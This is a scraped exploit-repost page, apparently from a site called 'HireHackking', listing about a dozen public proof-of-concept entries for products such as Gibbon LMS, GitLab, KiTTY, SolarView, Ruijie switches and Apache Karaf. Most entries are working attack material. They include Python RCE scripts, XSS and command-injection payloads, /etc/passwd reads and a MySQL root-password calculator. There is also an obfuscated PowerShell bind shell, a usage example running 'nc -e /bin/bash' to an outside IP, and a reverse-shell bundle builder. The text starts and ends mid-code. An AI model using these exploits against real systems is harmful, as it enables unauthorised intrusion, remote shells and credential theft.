rop_chain escape_sequence += b'\xE9\x3D\xFA\xFF\xFF' # jmp $eip-1471 escape_sequence += nops + b'\007' stdout = os.fdopen(sys.stdout.fileno(), 'wb') stdout.write(escape_sequence) stdout.flush()
HireHackking

LaborOfficeFree 19.10 - MySQL Root Password Calculator

HACKER · %s · %s

# Exploit Title: LaborOfficeFree 19.10 MySQL Root Password Calculator - CVE-2024-1346 # Google Dork: N/A # Date: 09/02/2023 # Exploit Author: Peter Gabaldon - https://pgj11.com/ # Vendor Homepage: https://www.laborofficefree.com/ # Software Link: https://www.laborofficefree.com/#plans # Version: 19.10 # Tested on: Windows 10 # CVE : CVE-2024-1346 # Description: LaborOfficeFree installs a MySQL instance that runs as SYSTEM and calculates the MySQL root password based on two constants. Each time the program needs to connect to MySQL as root, it employs the reverse algorithm to calculate the root password. This issue has been tested on version 19.10 exclusively, but allegedly, versions prior to 19.10 are also vulnerable. """ After installing LaborOfficeFree in testing lab and revesing the backup process, it is possible to determine that it creates a "mysqldump.exe" process with the root user and the password being derived from the string "hola" concated with "00331-20471-98465-AA370" (in this case). This appears to be the license, but it is different from the license shown in the GUI dashboard. This license has to be extracted from memory. From example, attaching a debugger and breaking in the mysqldump process (for that, admin rights are NOT needed). Also, the app checks if you are an admin to perform the backup and fails if the program is not running as adminsitrator. But, this check is not effective, as it is actually calling mysqldump with a derived password. Thus, administrator right are not needed. Here is the disassembly piece of the procedure in LaborOfficeFree.exe responsible of calculating the root password. 00506548 | 53 | push ebx | Aqui se hacen el XOR y demas que calcula la pwd :) 00506549 | 56 | push esi | 0050654A | A3 7CFD8800 | mov dword ptr ds:[88FD7C],eax | eax:"hola00331-20471-98465-AA370" 0050654F | 0FB7C2 | movzx eax,dx | eax:"hola00331-20471-98465-AA370" 00506552 | 85C0 | test eax,eax | eax:"hola00331-20471-98465-AA370" 00506554 | 7E 2E | jle laborofficefree.506584 | 00506556 | BA 01000000 | mov edx,1 | 0050655B | 8B1D 7CFD8800 | mov ebx,dword ptr ds:[88FD7C] | 00506561 | 0FB65C13 FF | movzx ebx,byte ptr ds:[ebx+edx-1] | 00506566 | 8B31 | mov esi,dword ptr ds:[ecx] | 00506568 | 81E6 FF000000 | and esi,FF | 0050656E | 33DE | xor ebx,esi | 00506570 | 8B1C9D A40B8800 | mov ebx,dword ptr ds:[ebx*4+880BA4] | 00506577 | 8B31 | mov esi,dword ptr ds:[ecx] | 00506579 | C1EE 08 | shr esi,8 | 0050657C | 33DE | xor ebx,esi | 0050657E | 8919 | mov dword ptr ds:[ecx],ebx | 00506580 | 42 | inc edx | 00506581 | 48 | dec eax | eax:"hola00331-20471-98465-AA370" 00506582 | 75 D7 | jne laborofficefree.50655B | 00506584 | 5E | pop esi | 00506585 | 5B | pop ebx | 00506586 | C3 | ret | The result number from this procedure is then negated (bitwise NOT) and casted as a signed integer. Note: the address 0x880BA4 stores a constant array of 256 DWORDs entries. 005065C8 | F755 F8 | not dword ptr ss:[ebp-8] | Running this script produces the root password of the LaborOfficeFree MySQL. C:\Users\***\Desktop>python myLaborRootPwdCalculator.py 1591779762 C:\Users\***\Desktop> """ #! /usr/bin/python3 from operator import xor import ctypes if __name__ == "__main__": magic_str = "hola00331-20471-98465-AA370" mask = 0x000000ff const = [0x0,0x77073096,0x0EE0E612C,0x990951BA,0x76DC419,0x706AF48F,0x0E963A535,0x9E6495A3,0x0EDB8832,0x79DCB8A4,0x0E0D5E91E,0x97D2D988,0x9B64C2B,0x7EB17CBD,0x0E7B82D07,0x90BF1D91,0x1DB71064,0x6AB020F2,0x0F3B97148,0x84BE41DE,0x1ADAD47D,0x6DDDE4EB,0x0F4D4B551,0x83D385C7,0x136C9856,0x646BA8C0,0x0FD62F97A,0x8A65C9EC,0x14015C4F,0x63066CD9,0x0FA0F3D63,0x8D080DF5,0x3B6E20C8,0x4C69105E,0x0D56041E4,0x0A2677172,0x3C03E4D1,0x4B04D447,0x0D20D85FD,0x0A50AB56B,0x35B5A8FA,0x42B2986C,0x0DBBBC9D6,0x0ACBCF940,0x32D86CE3,0x45DF5C75,0x0DCD60DCF,0x0ABD13D59,0x26D930AC,0x51DE003A,0x0C8D75180,0x0BFD06116,0x21B4F4B5,0x56B3C423,0x0CFBA9599,0x0B8BDA50F,0x2802B89E,0x5F058808,0x0C60CD9B2,0x0B10BE924,0x2F6F7C87,0x58684C11,0x0C1611DAB,0x0B6662D3D,0x76DC4190,0x1DB7106,0x98D220BC,0x0EFD5102A,0x71B18589,0x6B6B51F,0x9FBFE4A5,0x0E8B8D433,0x7807C9A2,0x0F00F934,0x9609A88E,0x0E10E9818,0x7F6A0DBB,0x86D3D2D,0x91646C97,0x0E6635C01,0x6B6B51F4,0x1C6C6162,0x856530D8,0x0F262004E,0x6C0695ED,0x1B01A57B,0x8208F4C1,0x0F50FC457,0x65B0D9C6,0x12B7E950,0x8BBEB8EA,0x0FCB9887C,0x62DD1DDF,0x15DA2D49,0x8CD37CF3,0x0FBD44C65,0x4DB26158,0x3AB551CE,0x0A3BC0074,0x0D4BB30E2,0x4ADFA541,0x3DD895D7,0x0A4D1C46D,0x0D3D6F4FB,0x4369E96A,0x346ED9FC,0x0AD678846,0x0DA60B8D0,0x44042D73,0x33031DE5,0x0AA0A4C5F,0x0DD0D7CC9,0x5005713C,0x270241AA,0x0BE0B1010,0x0C90C2086,0x5768B525,0x206F85B3,0x0B966D409,0x0CE61E49F,0x5EDEF90E,0x29D9C998,0x0B0D09822,0x0C7D7A8B4,0x59B33D17,0x2EB40D81,0x0B7BD5C3B,0x0C0BA6CAD,0x0EDB88320,0x9ABFB3B6,0x3B6E20C,0x74B1D29A,0x0EAD54739,0x9DD277AF,0x4DB2615,0x73DC1683,0x0E3630B12,0x94643B84,0x0D6D6A3E,0x7A6A5AA8,0x0E40ECF0B,0x9309FF9D,0x0A00AE27,0x7D079EB1,0x0F00F9344,0x8708A3D2,0x1E01F268,0x6906C2FE,0x0F762575D,0x806567CB,0x196C3671,0x6E6B06E7,0x0FED41B76,0x89D32BE0,0x10DA7A5A,0x67DD4ACC,0x0F9B9DF6F,0x8EBEEFF9,0x17B7BE43,0x60B08ED5,0x0D6D6A3E8,0x0A1D1937E,0x38D8C2C4,0x4FDFF252,0x0D1BB67F1,0x0A6BC5767,0x3FB506DD,0x48B2364B,0x0D80D2BDA,0x0AF0A1B4C,0x36034AF6,0x41047A60,0x0DF60EFC3,0x0A867DF55,0x316E8EEF,0x4669BE79,0x0CB61B38C,0x0BC66831A,0x256FD2A0,0x5268E236,0x0CC0C7795,0x0BB0B4703,0x220216B9,0x5505262F,0x0C5BA3BBE,0x0B2BD0B28,0x2BB45A92,0x5CB36A04,0x0C2D7FFA7,0x0B5D0CF31,0x2CD99E8B,0x5BDEAE1D,0x9B64C2B0,0x0EC63F226,0x756AA39C,0x26D930A,0x9C0906A9,0x0EB0E363F,0x72076785,0x5005713,0x95BF4A82,0x0E2B87A14,0x7BB12BAE,0x0CB61B38,0x92D28E9B,0x0E5D5BE0D,0x7CDCEFB7,0x0BDBDF21,0x86D3D2D4,0x0F1D4E242,0x68DDB3F8,0x1FDA836E,0x81BE16CD,0x0F6B9265B,0x6FB077E1,0x18B74777,0x88085AE6,0x0FF0F6A70,0x66063BCA,0x11010B5C,0x8F659EFF,0x0F862AE69,0x616BFFD3,0x166CCF45,0x0A00AE278,0x0D70DD2EE,0x4E048354,0x3903B3C2,0x0A7672661,0x0D06016F7,0x4969474D,0x3E6E77DB,0x0AED16A4A,0x0D9D65ADC,0x40DF0B66,0x37D83BF0,0x0A9BCAE53,0x0DEBB9EC5,0x47B2CF7F,0x30B5FFE9,0x0BDBDF21C,0x0CABAC28A,0x53B39330,0x24B4A3A6,0x0BAD03605,0x0CDD70693,0x54DE5729,0x23D967BF,0x0B3667A2E,0x0C4614AB8,0x5D681B02,0x2A6F2B94,0x0B40BBE37,0x0C30C8EA1,0x5A05DF1B,0x2D02EF8D] result = 0xffffffff for c in magic_str: aux = result & mask aux2 = xor(ord(c), aux) aux3 = xor(const[aux2], (result >> 8)) result = aux3 result = ~result result = ctypes.c_long(result).value print(result)
HireHackking

WordPress File Upload Plugin < 4.23.3 - Stored XSS

HACKER · %s · %s

Exploit Title: WordPress File Upload < 4.23.3 Stored XSS (CVE 2023-4811) Date: 18 December 2023 Exploit Author: Faiyaz Ahmad Vendor Homepage: https://wordpress.com/ Version: 4.23.3 CVE : CVE 2023-4811 Proof Of Concept: 1. Login to the wordpress account 2. Add the following shortcode to a post in "File Upload Plugin": [wordpress_file_upload redirect="true" redirectlink="*javascript:alert(1)*"] 3. Upload any file on the resulting post. 4. After the upload completes, you will see the XSS alert in the browser.
HireHackking

Nokia BMC Log Scanner - Remote Code Execution

HACKER · %s · %s

# Exploit Title: Nokia BMC Log Scanner Remote Code Execution # Google Dork: N/A # Date: November 29, 2023 # Exploit Author: Carlos Andres Gonzalez, Matthew Gregory # Vendor Homepage: https://www.nokia.com/ # Software Link: N/A # Version: 13 # Tested on: Linux # CVE : CVE-2022-45899 Description The BMC Log Scanner web application, available on several hosts, is vulnerable to command injection attacks, allowing for unauthenticated remote code execution. This vulnerability is especially significant because this service runs as root. Steps to Reproduce: In the Search Pattern field, type: ;";command Replacing the word "command" above with any Linux command. Root access can be confirmed with the id command or any other command that would require root access, such as displaying the contents of the /etc/shadow file." This issue was fixed in version 13.1.
HireHackking

UPS Network Management Card 4 - Path Traversal

HACKER · %s · %s

# Exploit Title: UPS Network Management Card 4 - Path Traversal # Google Dork: inurl:nmc inurl:logon.htm # Date: 2023-12-19 # Exploit Author: Víctor García # Vendor Homepage: https://www.apc.com/ # Version: 4 # Tested on: Kali Linux # CVE: N/A # PoC: curl -k https://10.10.10.10/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd root:x:0:0:root:/home/root:/bin/sh daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh dhcp:x:997:997::/var/run/dhcp:/bin/false messagebus:x:998:998::/var/lib/dbus:/bin/false mosquitto:x:999:999::/home/mosquitto:/bin/false nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
HireHackking

WEBIGniter v28.7.23 - Stored XSS

HACKER · %s · %s

## Title: WEBIGniter v28.7.23 XSS ## Author: RedTeamer IT Security, Mesut Cetin ## Date: 09/04/2023 ## Vendor: https://webigniter.net/ ## Software: https://webigniter.net/demo ## Reference: https://portswigger.net/web-security/cross-site-scripting/stored ## Description: During the user creation process, the 'your_name' parameter fails to adequately validate user input, rendering the system vulnerable to reflected cross-site scripting (XSS) attacks. ## PoC To exploit this vulnerability, an attacker can inject malicious JavaScript code into the "your_name" parameter under https://webigniter.net/create-account during the user creation process. This code, when embedded within an image tag like this: <img src onerror="prompt(8)">, can be executed when the user navigates to the "users" page under their profile. ## Mitigation To mitigate this risk, the "your_name" parameter should be subjected to rigorous input validation and encoding to ensure that all user input is sanitized and rendered harmless.
HireHackking

Gibbon LMS < v26.0.00 - Authenticated RCE

HACKER · %s · %s

# Exploit Title: Gibbon LMS has a PHP Deserialization vulnerability on the v26.0.00 version # Date: 22.01.2024 # Exploit Author: SecondX.io Research Team(Ali Maharramli,Fikrat Guliev,Islam Rzayev ) # Vendor Homepage: https://gibbonedu.org/ # Software Link: https://github.com/GibbonEdu/core # Version: v26.0.00 # Tested on: Ubuntu 22.0 # CVE : CVE-2024-24725 import requests import re import sys import base64 import urllib.parse def login(target_host, target_port,email,password): url = f'http://{target_host}:{target_port}/login.php?timeout=true' headers = {"Content-Type": "multipart/form-data; boundary=---------------------------174475955731268836341556039466"} data = f"-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"address\"\r\n\r\n\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"method\"\r\n\r\ndefault\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n{email}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n{password}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"gibbonSchoolYearID\"\r\n\r\n025\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"gibboni18nID\"\r\n\r\n0002\r\n-----------------------------174475955731268836341556039466--\r\n" r = requests.post(url, headers=headers, data=data, allow_redirects=False) print(url) print(r.headers) Session_Cookie = re.split(r"\s+", r.headers['Set-Cookie']) if Session_Cookie[4] is not None and '/index.php' in str(r.headers['Location']): print("[X] Login successful!") return Session_Cookie[4] def generate_payload(command): # Given base64-encoded string ### Actual Payload: ### a:2:{i:7%3BO:32:"Monolog\Handler\SyslogUdpHandler":1:{s:9:"%00*%00socket"%3BO:29:"Monolog\Handler\BufferHandler":7:{s:10:"%00*%00handler"%3Br:3%3Bs:13:"%00*%00bufferSize"%3Bi:-1%3Bs:9:"%00*%00buffer"%3Ba:1:{i:0%3Ba:2:{i:0%3Bs:COMMAND_SIZE:"COMMAND"%3Bs:5:"level"%3BN%3B}}s:8:"%00*%00level"%3BN%3Bs:14:"%00*%00initialized"%3Bb:1%3Bs:14:"%00*%00bufferLimit"%3Bi:-1%3Bs:13:"%00*%00processors"%3Ba:2:{i:0%3Bs:7:"current"%3Bi:1%3Bs:6:"system"%3B}}}i:7%3Bi:7%3B} base64_encoded_string = 'YToyOntpOjclM0JPOjMyOiJNb25vbG9nXEhhbmRsZXJcU3lzbG9nVWRwSGFuZGxlciI6MTp7czo5OiIlMDAqJTAwc29ja2V0IiUzQk86Mjk6Ik1vbm9sb2dcSGFuZGxlclxCdWZmZXJIYW5kbGVyIjo3OntzOjEwOiIlMDAqJTAwaGFuZGxlciIlM0JyOjMlM0JzOjEzOiIlMDAqJTAwYnVmZmVyU2l6ZSIlM0JpOi0xJTNCczo5OiIlMDAqJTAwYnVmZmVyIiUzQmE6MTp7aTowJTNCYToyOntpOjAlM0JzOkNPTU1BTkRfU0laRToiQ09NTUFORCIlM0JzOjU6ImxldmVsIiUzQk4lM0J9fXM6ODoiJTAwKiUwMGxldmVsIiUzQk4lM0JzOjE0OiIlMDAqJTAwaW5pdGlhbGl6ZWQiJTNCYjoxJTNCczoxNDoiJTAwKiUwMGJ1ZmZlckxpbWl0IiUzQmk6LTElM0JzOjEzOiIlMDAqJTAwcHJvY2Vzc29ycyIlM0JhOjI6e2k6MCUzQnM6NzoiY3VycmVudCIlM0JpOjElM0JzOjY6InN5c3RlbSIlM0J9fX1pOjclM0JpOjclM0J9' command_size = len(command) # Decode base64 decoded_bytes = base64.b64decode(base64_encoded_string) decoded_string = decoded_bytes.decode('utf-8') # URL decode payload = urllib.parse.unquote(decoded_string) # Replace placeholders in the decoded string payload = payload.replace('COMMAND_SIZE', str(command_size)) payload = payload.replace('COMMAND', command) print("[X] Payload Generated!") return payload def rce(cookie, target_host, target_port, command): url = f'http://{target_host}:{target_port}/index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4' headers = {"Content-Type": "multipart/form-data; boundary=---------------------------104550429928543086952438317710","Cookie": cookie} payload = generate_payload(command) data = f'-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="address"\r\n\r\n/modules/System Admin/import_run.php\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="mode"\r\n\r\nsync\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="syncField"\r\n\r\nN\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="syncColumn"\r\n\r\n\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="columnOrder"\r\n\r\n{payload}\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition:form-data; name="columnText"\r\n\r\nN;\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="fieldDelimiter"\r\n\r\n%2C\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="stringEnclosure"\r\n\r\n%22\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="filename"\r\n\r\nDataStructure-externalAssessment.xlsx\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="csvData"\r\n\r\n"External Assessment","Assessment Date","Student","Field Name Category","Field Name","Result"\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="ignoreErrors"\r\n\r\n1\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="Failed"\r\n\r\nSubmit\r\n-----------------------------104550429928543086952438317710--' r = requests.post(url, headers=headers, data=data, allow_redirects=False) print("[X] Request sent!") start_index = r.text.find("<h2>Step 4 - Live Run</h2>") end_index = r.text.find("<div class", start_index) result = r.text[start_index+26:end_index].strip() if result != '': print("[X] Execution result: \n"+result) else: print("[X] Command failed or did not output anything.") with open("pocresponse.html", "wb") as f: f.write(r.content) if __name__ == '__main__': if len(sys.argv) != 6: print("[X] Usage: script.py <target_host> <target_port/url> <email> <password> <command>") print("[X] Example: python gibbon_rce.py 192.168.1.100 80/gibbon test.email@localhost.com password1 \"./nc -e /bin/bash 172.28.218.3 4444\"") sys.exit(1) cookie = login(sys.argv[1], sys.argv[2],sys.argv[3],sys.argv[4]) rce(cookie, sys.argv[1], sys.argv[2], sys.argv[5])
HireHackking

Backdrop CMS 1.23.0 - Stored XSS

HACKER · %s · %s

# Exploit Title: Backdrop CMS 1.23.0 - Stored Cross-Site Scripting - Post Body Field # Date: 2023-08-21 # Exploit Author: Sinem Şahin # Vendor Homepage: https://backdropcms.org/ # Version: 1.23.0 # Tested on: Windows & XAMPP ==> Tutorial <== 1- Go to the following url. => http://(HOST)/backdrop/node/add/post 2- Write your xss payload in the body of the post. Formatting options should be RAW HTML to choose from. 3- Press "Save" button. XSS Payload ==> "<script>alert("post_body")</script>
HireHackking

SolarView Compact 6.00 - Command Injection

HACKER · %s · %s

#- Exploit Title: SolarView Compact 6.00 - Command Injection #- Shodan Dork: http.html:"solarview compact" #- Exploit Author: ByteHunter #- Email: 0xByteHunter@proton.me #- Version: 6.00 #- Tested on: 6.00 #- CVE : CVE-2023-23333 import argparse import requests def vuln_check(ip_address, port): url = f"http://{ip_address}:{port}/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg%3D%3D|base64%20-d|bash%00.zip" response = requests.get(url) if response.status_code == 200: output = response.text if "root" in output: print("Vulnerability detected: Command Injection possible.") print(f"passwd file content:\n{response.text}") else: print("No vulnerability detected.") else: print("Error: Unable to fetch response.") def main(): parser = argparse.ArgumentParser(description="SolarView Compact Command Injection ") parser.add_argument("-i", "--ip", help="IP address of the target device", required=True) parser.add_argument("-p", "--port", help="Port of the the target device (default: 80)", default=80, type=int) args = parser.parse_args() ip_address = args.ip port = args.port vuln_check(ip_address, port) if __name__ == "__main__": main()
HireHackking

GitLab CE/EE < 16.7.2 - Password Reset

HACKER · %s · %s

# Exploit Title: GitLab CE/EE < 16.7.2 - Password Reset # Exploit Author: Sebastian Kriesten (0xB455) # Twitter: https://twitter.com/0xB455 # Date: 2024-01-12 # Vendor Homepage: gitlab.com # Vulnerability disclosure: https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/ # Version: <16.7.2, <16.6.4, <16.5.6 # CVE: CVE-2023-7028 Proof of Concept: user[email][]=valid@email.com&user[email][]=attacker@email.com
HireHackking

Ruijie Switch PSG-5124 26293 - Remote Code Execution (RCE)

HACKER · %s · %s

#- Exploit Title: Ruijie Switch PSG-5124 26293 - Remote Code Execution (RCE) #- Shodan Dork: http.html_hash:-1402735717 #- Fofa Dork: body="img/free_login_ge.gif" && body="./img/login_bg.gif" #- Exploit Author: ByteHunter #- Email: 0xByteHunter@proton.me #- Version: PSG-5124(LINK SOFTWARE RELEASE:26293) #- Tested on: PSG-5124(LINK SOFTWARE RELEASE:26293) import http.client import argparse def send_request(ip, port, command): headers = { "Host": f"{ip}:{port}", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "DNT": "1", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Cmdnum": "1", "Confirm1": "n", "Content-Length": "0", "Command1": command } try: connection = http.client.HTTPConnection(f"{ip}:{port}") connection.request("GET", "/EXCU_SHELL", headers=headers) response = connection.getresponse() print(f"Status Code: {response.status}") print(response.read().decode('utf-8')) connection.close() except Exception as e: print(f"Request failed: {e}") if __name__ == "__main__": parser = argparse.ArgumentParser(description='proof of concept for ruijie Switches RCE') parser.add_argument('--ip', help='Target IP address', required=True) parser.add_argument('--port', help='Port', required=True) parser.add_argument('--cmd', help='Command', required=True) args = parser.parse_args() ip = args.ip port = args.port command = args.cmd send_request(ip, port, command)
HireHackking

KiTTY 0.76.1.13 - Command Injection

HACKER · %s · %s

# Exploit Title: KiTTY 0.76.1.13 - Command Injection # Exploit Author: DEFCESCO (Austin A. DeFrancesco) # Vendor Homepage: https://github.com/cyd01/KiTTY/= # Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip # Version: ≤ 0.76.1.13 # Tested on: Microsoft Windows 11/10/8/7/XP # CVE: CVE-2024-23749 #-------------------------------------------------------------------------------------# # Blog: https://blog.DEFCESCO.io/Hell0+KiTTY #-------------------------------------------------------------------------------------# # msf6 payload(cmd/windows/powershell_bind_tcp) > to_handler # # [*] Payload Handler Started as Job 1 # # msf6 payload(cmd/windows/powershell_bind_tcp) > # # [*] Started bind TCP handler against 192.168.100.28:4444 # # [*] Powershell session session 1 opened (192.168.100.119:36969 -> 192.168.100.28:4444) # #----------------------------------------------------------------------------------------# import os import sys #-----------------------------------------------------------------# # msf6 payload(cmd/windows/powershell_bind_tcp) > generate -f raw # #-----------------------------------------------------------------# shellcode = b'powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create' shellcode += b'((New-Object System.IO.StreamReader(New-Object System.IO.Compression.G' shellcode += b'zipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBa' shellcode += b'se64String(((\'H4sIAE7efGUCA5VVTW/b{2}BC{1}+1cMD{2}1GQiTCDXoKkGJdNV0Ey' shellcode += b'LZGlTYHw0BoahxrQ5NekoptJP7vJSXqw3\'+\'GCbXWwJc7w8fHNG3JRCmYKKeBvNMktzh' shellcode += b'kvUBgYPA3APsGG\'+\'wQV8wU3ydf4vMgPJzW6NX+gK7aAhNj+t8ptk8l3jJ1zQkptUYW4' shellcode += b'jBeXa\'+\'QgRGld\'+\'hmTZTc7siLDDveG2lyB/vBoqG4lhtU{1}suygyo+oYquwvp{1' shellcode += b'}mhlViPtZkMrVioo8PhzNNGdSvBj8JDeCS5pXo5HHVJKh1u\'+\'AFWMm85{2}gI/hVGUK' shellcode += b'cUCwibZSDB/2A4L0Q+jKpgPa+aywttUKCy\'+\'k6fZzr6viFMtk+wBjSY3bH3tM2bv7XM' shellcode += b'8kWhDlXHr\'+\'+pWrqC/RRS{1}vzBiujQWsyxHWVPZv0VX4iErjMeMWulfy15inE7/QcB' shellcode += b'g76n6{1}Qa2ZNgrpyhGs8Yj1VlaNWWIdpbokNSNnj6GvQI+P1jxrwN6ghKxUhdmRrEkN/f' shellcode += b'pxsLA+wjh8Cm4s+h4SqmF6M{2}cbrqTBFJUpFgWjBn{1}QXuTUmS2lnM8pe5hF0St0yLg0' shellcode += b'S+dUN2ms{2}zECUXIeDw3X786GnkEfoFWm21lfuul8Z3A6mwXu35luRMjZyD7PfzyN{\'+' shellcode += b'\'1}l5dFHkTDqcGt4agYDJ3jj4/H2fp1VXkFP/ocsLhrbWm3GiYu{2}bJlsg5qFIImw\'+' shellcode += b'\'1Wj1Jbew7hFAIUj+fuS7jmPrVjtjRtgMnVujRd8E6kcr\'+\'1Txf3SQJhG8E/BlNRyY' shellcode += b'SCVai1VJSGBsVvMJWlQaLEfMSd34k5443k5yK0tBobdxuJR3H2Qax\'+\'T3Ztk3Tt{2}2' shellcode += b'fesc{2}ef3VJqezuDaQjpZfMuTlufvc21mfZbqkrKl5VyDQiHaI6XL6mi7Jzw4iSPS7LY+' shellcode += b'tBqk6PlKPMoHTC63a6uttnq3KPu+pTbLgmMYBkXlunoT35DmYe2xGEYxBAfsI0gEwuhI0k' shellcode += b'unH+Y3Vsu3LgXfmC6FVBpfes07FNte1FHpofnzodpd\'+\'IyoERfSimrYbXTGP{1}g1Jc' shellcode += b'7\'+\'jV4Gcf/nwHz/C1NEmNCt48B1BnUAnSAJ/CySSDE/tf6X8tWeXhiEyoWbroBzjpQL' shellcode += b'a{2}SIBKSTUdzQ4W67Gu4oRxpCqMXmNw0f+wrbYdHBv4l/zbwfyvY/uGPfJrM+czL/Wyve' shellcode += b'/8weMP85RLjX4/VTs2t1DfMN3VlBm5bu4j/2ud2V7lbe3cFfoTVXnPBo0IAAA{0}\')-f' shellcode += b'\'=\',\'9\',\'O\')))),[System.IO.Compression.CompressionMode]::Decompr' shellcode += b'ess))).ReadToEnd()))\"' escape_sequence = b'\033]0;__rv:' escape_sequence += b'" & ' escape_sequence += shellcode escape_sequence += b' #\007' stdout = os.fdopen(sys.stdout.fileno(), 'wb') stdout.write(escape_sequence) stdout.flush()
HireHackking
# Exploit Title: Winter CMS 1.2.2 - Server-Side Template Injection (SSTI) (Authenticated) # Exploit Author: tmrswrr # Date: 12/05/2023 # Vendor: https://wintercms.com/ # Software Link: https://github.com/wintercms/winter/releases/v1.2.2 # Vulnerable Version(s): 1.2.2 #Tested : https://www.softaculous.com/demos/WinterCMS 1 ) Login with admin cred and click CMS > Pages field > Plugin components > https://demos6.demo.com/WinterCMS/backend/cms#secondarytab-cmslangeditormarkup 2 ) Write SSTI payload : {{7*7}} 3 ) Save it , Click Priview : https://demos6.demo.com/WinterCMS/demo/plugins 4 ) You will be see result : 49 Payload : {{ dump() }} Result : "*::database" => array:4 [▼ "default" => "mysql" "connections" => array:4 [▼ "sqlite" => array:5 [▼ "database" => "/home/soft/public_html/WinterCMSmcviotyn9i/storage/database.sqlite" "driver" => "sqlite" "foreign_key_constraints" => true "prefix" => "" "url" => null ] "mysql" => array:15 [▼ "charset" => "utf8mb4" "collation" => "utf8mb4_unicode_ci" "database" => "soft_pw3qsny" "driver" => "mysql" "engine" => "InnoDB" "host" => "localhost" "options" => [] "password" => "8QSz9(pT)3" "port" => 3306 "prefix" => "" "prefix_indexes" => true "strict" => true "unix_socket" => "" "url" => null "username" => "soft_pw3qsny" ] "pgsql" => array:12 [▶] "sqlsrv" => array:10 [▶] ] "migrations" => "migrations" "redis" => array:4 [▼ "client" => "phpredis" "options" => array:2 [▼ "cluster" => "redis" "prefix" => "winter_database_" ] "default" => array:5 [▼ "database" => "0" "host" => "127.0.0.1" "password" => null "port" => "6379" "url" => null ] "cache" => array:5 [▼ "database" => "1" "host" => "127.0.0.1" "password" => null "port" => "6379" "url" => null ] ] ] ]
HireHackking

Karaf v4.4.3 Console - RCE

HACKER · %s · %s

#!/usr/bin/python # Exploit Title: [Karaf v4.4.3 Console RCE] # Date: [2023-08-07] # Exploit Author: [Andrzej Olchawa, Milenko Starcik, # VisionSpace Technologies GmbH] # Exploit Repository: # [https://github.com/visionspacetec/offsec-karaf-exploits.git] # Vendor Homepage: [https://karaf.apache.org] # Software Link: [https://karaf.apache.org/download.html] # Version: [4.4.3] # Tested on: [Linux kali 6.3.0-kali1-amd64] # License: [MIT] # # Usage: # python exploit.py --help # # Example: # python exploit.py --rhost=192.168.0.133 --rport=1337 \ # --lhost=192.168.0.100 --lport=4444 \ # --creds=karaf:karaf """ This tool will let you open a reverse shell from the system that is running Karaf Console", """ import argparse import base64 import io import re import zipfile import requests # Content of the MANIFEST.MF file. MANIFEST_CONTENT = \ "Bundle-Name: RevShell\n" \ "Bundle-Description: Bundle openning a reverse shell connection.\n" \ "Bundle-SymbolicName: com.visionspace.osgi.revshell.Activator\n" \ "Bundle-Vendor: VisionSpace\n" \ "Bundle-Version: 1.0.0\n" \ "Import-Package: org.osgi.framework\n" \ "Bundle-Activator: com.visionspace.osgi.revshell.Activator" # Activator.class bytecode template. ACTIVATOR_CLASS_BYTECODE_TEMPLATE = \ b"\xca\xfe\xba\xbe\x00\x00\x00\x37\x00\x7b" \ b"\x0a\x00\x22\x00\x33\x08\x00\x34\x07\x00" \ b"\x35\x07\x00\x36\x0a\x00\x03\x00\x37\x0a" \ b"\x00\x03\x00\x38\x0a\x00\x03\x00\x39\x07" \ b"\x00\x3a\x08\x00\x3b\x08\x00\x3c\x0a\x00" \ b"\x3d\x00\x3e\x0a\x00\x08\x00\x3f\x0a\x00" \ b"\x2c\x00\x40\x0a\x00\x2c\x00\x41\x0a\x00" \ 